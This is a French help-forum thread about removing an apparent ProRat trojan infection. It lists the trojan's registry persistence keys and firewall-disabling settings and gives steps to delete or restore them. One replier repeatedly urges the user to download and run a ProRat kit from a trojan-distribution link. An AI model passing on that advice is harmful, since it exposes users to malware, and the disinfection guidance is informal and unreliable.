Voila mon hijack this es ke je ss in fecter
Fermé
jimmy.de
Messages postés
69
Date d'inscription
samedi 29 septembre 2007
Statut
Membre
Dernière intervention
27 janvier 2009
-
29 sept. 2007 à 18:12
flash-one - 29 sept. 2007 à 20:17
flash-one - 29 sept. 2007 à 20:17
A voir également:
- Voila mon hijack this es ke je ss in fecter
- Navigation in private - Guide
- Deco in paris avis ✓ - Forum Consommation & Internet
- Déco in paris site fiable ???? - Forum Consommation & Internet
- Rf in - Forum Téléviseurs
- This media cannot boot in legacy mode - Forum logiciel systeme
8 réponses
Bonjour,
telecharge ce logiciel
dezipe le et fais le tourner:
http://195.20.14.223/out.php?url=http%3A%2F%2Fwww.trojanfrance.com%2Findex.php%3Fdir%3DTrojans%2FProRAT%2F%26file%3DProRat%2Bv1.9.zip
telecharge ce logiciel
dezipe le et fais le tourner:
http://195.20.14.223/out.php?url=http%3A%2F%2Fwww.trojanfrance.com%2Findex.php%3Fdir%3DTrojans%2FProRAT%2F%26file%3DProRat%2Bv1.9.zip
green day
Messages postés
26371
Date d'inscription
vendredi 30 septembre 2005
Statut
Modérateur, Contributeur sécurité
Dernière intervention
27 décembre 2019
2 162
29 sept. 2007 à 18:53
29 sept. 2007 à 18:53
je t'ai pourtant donné la marche à suivre ... :/
message d ereur fservice exe non trouvable#dernier
...
message d ereur fservice exe non trouvable#dernier
...
ouvre le registre
regarde a ses clès s'il est present:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\(5Y99AE78-58TT-11dW-BE53-Y67078979Y)
StubPath
<System>\sservice.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
DirectX For Microsoft® Windows
<System>\fservice.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell
Explorer.exe <System>\fservice.exe
regarde a ses clès s'il est present:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\(5Y99AE78-58TT-11dW-BE53-Y67078979Y)
StubPath
<System>\sservice.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
DirectX For Microsoft® Windows
<System>\fservice.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell
Explorer.exe <System>\fservice.exe
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
jimmy.de
Messages postés
69
Date d'inscription
samedi 29 septembre 2007
Statut
Membre
Dernière intervention
27 janvier 2009
2
29 sept. 2007 à 19:39
29 sept. 2007 à 19:39
oui il existe tt c clé flash-one
supprime la clè de demarrage:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\
Run
"DirectX For Microsoft® Windows"="%SYSDIR%\fservice.exe"
ainsi que ceux la:
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath"="%SYSDIR%\sservice.exe"
– [HKCU\Software\Microsoft DirectX\WinSettings]
"Bulas"=%réglages définis par l'utilisateur%
"FW_KILL"=%réglages définis par l'utilisateur%
"XP_FW_Disable"=%réglages définis par l'utilisateur%
"XP_SYS_Recovery"=%réglages définis par l'utilisateur%
"ICQ_UIN"=%réglages définis par l'utilisateur%
"ICQ_UIN2"=%réglages définis par l'utilisateur%
"Kurban_Ismi"=%réglages définis par l'utilisateur%
"Mail"=%réglages définis par l'utilisateur%
"Online_List"=%réglages définis par l'utilisateur%
"Port"=%réglages définis par l'utilisateur%
"Sifre"=%réglages définis par l'utilisateur%
"Hata"=%réglages définis par l'utilisateur%
"Tport"=%réglages définis par l'utilisateur%
"ServerVersionInt"=%réglages définis par l'utilisateur%
pour les suivantes "FAUT PAS LES SUPPRIMER" les modifier a leurs anciennes valeurs:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
L'ancienne valeur:
• "Shell"="Explorer.exe"
La nouvelle valeur:
• "Shell"="Explorer.exe %SYSDIR%\fservice.exe"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
HKLM\SYSTEM\ControlSet001\Services\srservice
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\
Run
"DirectX For Microsoft® Windows"="%SYSDIR%\fservice.exe"
ainsi que ceux la:
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath"="%SYSDIR%\sservice.exe"
– [HKCU\Software\Microsoft DirectX\WinSettings]
"Bulas"=%réglages définis par l'utilisateur%
"FW_KILL"=%réglages définis par l'utilisateur%
"XP_FW_Disable"=%réglages définis par l'utilisateur%
"XP_SYS_Recovery"=%réglages définis par l'utilisateur%
"ICQ_UIN"=%réglages définis par l'utilisateur%
"ICQ_UIN2"=%réglages définis par l'utilisateur%
"Kurban_Ismi"=%réglages définis par l'utilisateur%
"Mail"=%réglages définis par l'utilisateur%
"Online_List"=%réglages définis par l'utilisateur%
"Port"=%réglages définis par l'utilisateur%
"Sifre"=%réglages définis par l'utilisateur%
"Hata"=%réglages définis par l'utilisateur%
"Tport"=%réglages définis par l'utilisateur%
"ServerVersionInt"=%réglages définis par l'utilisateur%
pour les suivantes "FAUT PAS LES SUPPRIMER" les modifier a leurs anciennes valeurs:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
L'ancienne valeur:
• "Shell"="Explorer.exe"
La nouvelle valeur:
• "Shell"="Explorer.exe %SYSDIR%\fservice.exe"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
HKLM\SYSTEM\ControlSet001\Services\srservice
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
ps: pour l'ancienne valeur met 2
a ses 2 clè:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
HKLM\SYSTEM\ControlSet001\Services\srservice
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
a ses 2 clè:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004
HKLM\SYSTEM\ControlSet001\Services\srservice
L'ancienne valeur:
• "Start"=%réglages définis par l'utilisateur%
La nouvelle valeur:
• "Start"=dword:00000004